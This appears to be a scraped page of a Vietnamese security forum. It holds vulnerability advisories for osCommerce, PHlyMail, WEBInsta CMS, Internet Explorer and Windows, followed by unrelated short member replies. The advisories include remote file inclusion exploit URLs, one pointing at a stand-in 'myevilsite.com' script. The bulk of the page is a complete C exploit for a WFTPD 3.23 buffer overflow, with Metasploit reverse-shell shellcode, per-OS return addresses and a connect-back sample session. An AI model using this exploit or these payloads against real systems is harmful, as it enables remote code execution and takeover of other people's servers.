| |
|
|
Version(s): 2.2 Milestone 2
Description: A vulnerability was reported in osCommerce. A remote user can inject SQL commands.
The 'shopping_cart.php' script does not properly validate user-supplied input, as the magic quotes emulation implementation contains a flaw. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.
A remote user can exploit the tep_cache_also_purchased() function in 'cache.php' to determine whether files exist or not and determine the installation path.
James Bercegay of the GulfTech Security Research Team discovered this vulnerability.
The original advisory is available at:
http://www.gulftech.org/?node=research&article_id=00110-08172006
Impact: A remote user can execute SQL commands on the underlying database.
A remote user can determine the installation path and determine whether specified files exist on the target system.
Solution: The vendor has issued a fix (2.2 Milestone 2 060817 Update), available at:
http://www.oscommerce.com/solutions/downloads
The osCommerce advisory is available at:
http://forums.oscommerce.com/index.php?showtopic=223556&pid=918371
|
 |
|
|
PHlyMail Include File Bug in '_PM_['path']['handler']' Parameter Lets Remote Users Execute Arbitrary
Version(s): 3.4.4 and prior versions
Description: A vulnerability was reported in PHlyMail. A remote user can include and execute arbitrary code on the target system.
The 'handlers/email/mod.listmail.php' script does not properly validate user-supplied input in the '_PM_['path']['handler']' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
+http://[target]/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]
Kacper (a.k.a Rahim) discovered this vulnerability.
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
|
|
|
|
Code:
/*
* wftpd_exp.c
* WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
* coded by h07 <h07@interia.pl>
* tested on XP SP2 polish, 2000 SP4 polish
* example..
C:>wftpd_exp 0 0 192.168.0.2 h07 open 192.168.0.1 4444
[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploit
[*] coded by h07 <h07@interia.pl>
[*] FTP response: 331 Give me your password, please
[*] FTP response: 230 Logged in successfully
[+] sending buffer: ok
[*] press enter to quit
C:>nc -l -p 4444
Microsoft Windows XP [Wersja 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:wftpd323>
*/
#include <winsock2.h>
#define BUFF_SIZE 1024
#define PORT 21
//win32 reverse shellcode (metasploit.com)
char shellcode[] =
"x31xc9x83xe9xb8xd9xeexd9x74x24xf4x5bx81x73x13xb6"
"x10x92x98x83xebxfcxe2xf4x4ax7ax79xd5x5exe9x6dx67"
"x49x70x19xf4x92x34x19xddx8ax9bxeex9dxcex11x7dx13"
"xf9x08x19xc7x96x11x79xd1x3dx24x19x99x58x21x52x01"
"x1ax94x52xecxb1xd1x58x95xb7xd2x79x6cx8dx44xb6xb0"
"xc3xf5x19xc7x92x11x79xfex3dx1cxd9x13xe9x0cx93x73"
"xb5x3cx19x11xdax34x8exf9x75x21x49xfcx3dx53xa2x13"
"xf6x1cx19xe8xaaxbdx19xd8xbex4exfax16xf8x1ex7exc8"
"x49xc6xf4xcbxd0x78xa1xaaxdex67xe1xaaxe9x44x6dx48"
"xdexdbx7fx64x8dx40x6dx4exe9x99x77xfex37xfdx9ax9a"
"xe3x7ax90x67x66x78x4bx91x43xbdxc5x67x60x43xc1xcb"
"xe5x53xc1xdbxe5xefx42xf0xb6x10x92x98xd0x78x92x98"
"xd0x43x1bx79x23x78x7ex61x1cx70xc5x67x60x7ax82xc9"
"xe3xefx42xfexdcx74xf4xf0xd5x7dxf8xc8xefx39x5ex11"
"x51x7axd6x11x54x21x52x6bx1cx85x1bx65x48x52xbfx66"
"xf4x3cx1fxe2x8exbbx39x33xdex62x6cx2bxa0xefxe7xb0"
"x49xc6xc9xcfxe4x41xc3xc9xdcx11xc3xc9xe3x41x6dx48"
"xdexbdx4bx9dx78x43x6dx4exdcxefx6dxafx49xc0xfax7f"
"xcfxd6xebx67xc3x14x6dx4ex49x67x6ex67x66x78x62x12"
"xb2x4fxc1x67x60xefx42x98";
void config_shellcode(unsigned long ip, unsigned short port)
{
memcpy(&shellcode[184], &ip, 4);
memcpy(&shellcode[190], &port, 2);
}
unsigned long target[] =
{
0x7d16887b, //JMP ESI (XP SP2 polish)
0x776f2015, //JMP ESI (2000 SP4 polish)
0x7cb9e082, //JMP ESI (XP SP2 english)
0x7848a5f1, //JMP ESI (2000 SP4 english)
0x7ca96834 //JMP ESI (XP SP2 german)
};
char buffer[BUFF_SIZE];
main(int argc, char *argv[])
{
int sock, id, opt, r_len;
unsigned long eip;
unsigned long connectback_IP;
unsigned short connectback_port;
struct hostent *he;
struct sockaddr_in client;
WSADATA wsa;
printf("n[*] WFTPD server 3.23 (SIZE) 0day remote buffer overflow exploitn");
printf("[*] coded by h07 <h07@interia.pl>n");
if(argc < 8)
{
printf("[*] usage:..n %s <ID> <opt> <host> <user> <pass> <connectback_IP> <connectback_port>nn", argv[0]);
printf("[*] ID list:n");
printf("[>] 0: XP SP2 polishn");
printf("[>] 1: 2000 SP4 polishn");
printf("[>] 2: XP SP2 englishn");
printf("[>] 3: 2000 SP4 englishn");
printf("[>] 4: XP SP2 germannn");
printf("[*] opt - WFTPD option 'restrict to home directory and below'n");
printf("[>] 0: disabledn");
printf("[>] 1: enablednn");
printf("[*] sample: %s 0 0 192.168.0.2 h07 open 192.168.0.1 4444nn", argv[0]);
exit(0);
}
WSAStartup(MAKEWORD(2, 0), &wsa);
id = atoi(argv[1]);
opt = atoi(argv[2]);
if((id > 4) || (id < 0))
{
printf("[-] ID error: unknown targetn");
exit(-1);
}
if((opt > 1) || (opt < 0))
{
printf("[-] opt error: unknown optionn");
exit(-1);
}
eip = target[id];
connectback_IP = inet_addr(argv[6]) ^ (ULONG)0x989210b6;
connectback_port = htons(atoi(argv[7])) ^ (USHORT)0x9892;
config_shellcode(connectback_IP, connectback_port);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if((he = gethostbyname(argv[3])) == NULL)
{
printf("[-] Unable to resolven");
exit(-1);
}
client.sin_addr = *((struct in_addr *)he->h_addr);
client.sin_port = htons(PORT);
client.sin_family = AF_INET;
if(connect(sock, (struct sockaddr *) &client, sizeof(client)) == -1)
{
printf("[-] error: connect()n");
exit(-1);
}
recv(sock, buffer, BUFF_SIZE -1, 0);
//USER
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "USER %srn", argv[4]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);
//PASS
memset(buffer, 0, BUFF_SIZE);
sprintf(buffer, "PASS %srn", argv[5]);
send(sock, buffer, strlen(buffer), 0);
recv(sock, buffer, BUFF_SIZE -1, 0);
printf("[*] FTP response: %s", buffer);
if(strstr(buffer, "530") != 0) exit(-1);
//SIZE
memset(buffer, 0x90, BUFF_SIZE);
memcpy(buffer, "SIZE ", 5);
switch(opt)
{
case 0:
{
memcpy(buffer + 5, "/", 1);
r_len = 531;
break;
}
case 1:
{
memcpy(buffer + 5, "//", 2);
r_len = 532;
break;
}
}
memcpy(buffer + 7, shellcode, sizeof(shellcode) -1);
*((unsigned long*)(&buffer[r_len])) = eip;
memcpy(buffer + (r_len + 4), "rnx00", 3);
if(send(sock, buffer, strlen(buffer), 0) != -1)
printf("[+] sending buffer: okn");
else
printf("[-] sending buffer: failedn");
printf("[*] press enter to quitn");
getchar();
}
//EoF
//
|
|
|
|
Summary:
Microsoft Internet Explorer is prone to a denial-of-service vulnerability.
This issue occurs because the application fails to load a DLL library when instantiated as an ActiveX control.
An attacker may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users, and may cause arbitrary code to run within the context of the application.
Attackers can exploit this issue via a web client.
The following proof of concept is available:
http://www.securityfocus.com/data/vulnerabilities/exploits/internet-explorer-msoe.dll.html
|
|
|
|
Vulnerable product : http://www.webinsta.com/download.html ( WEBInsta. CMS 0.3.1 )
Author : Yns - yns.zaxaz.com
Exploit:
+http://[HOST]/[PATH]/modules/usersonline/users.php?module_dir=[REMOTE_FILE]
|
|
|
|
Microsoft Windows is reportedly prone to a remote denial-of-service vulnerability because the PNG-rendering portion of the operating system fails to handle malicious PNG (Portable Network Graphics) files.
This issue may cause Windows Explorer to consume excessive resources and crash, denying service to legitimate users.
The following exploit files demonstrates this issue:
http://www.securityfocus.com/data/vulnerabilities/exploits/Xsec-06-01.rar
http://www.securityfocus.com/data/vulnerabilities/exploits/19520.pl
|
|
|
|
Đã check và PM
Thân
|
|
|
|
Tôi đã check lỗi của host và PM, còn forum thì cập nhật bản vá mới đi.
Thân
|
|
|
|
Hi
Bây giờ bạn up lên 2.0 rồi check hay là giữ im như vậy để check?
Thân
|
|
|
|
hehe, lão Z0rr0 cố gắng làm lại thử xem sao 
|
|
|
|
|
Tại sao bạn không vào trang chủ của nó để down ver 2.0? Nó nằm ở footer ấy
|
|
|
|
|
Lần sau lưu ý post đúng forum.
|
|
|
|
Get more info here:
http://www.computerhope.com/jargon/l/lmhost.htm
|
|
|
|
Go to :
http://www.computerhope.com/forhlp.htm
And learn more for FOR command
|
|
|
|
|
Lưu ý: nên dùng những tool đó ngay sao khi lỡ xoá file, tránh restart và copy thêm nhiều vào.
|
|
|
|
TY lão G.A, mấy bữa này busy quá, không vô hồi âm sớm được 
|
|
|
|
Xem sơ qua quy định về check forum. Đọc kỹ topic này:
http://www.vbulletin.com/forum/showthread.php?t=194061
Còn về hosting khi nào check xong sẽ PM
Thân
|
|
|
|
Xem chi tiết tại đây:
http://www.ntfs.com/ntfs_vs_fat.htm
|
|
|
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
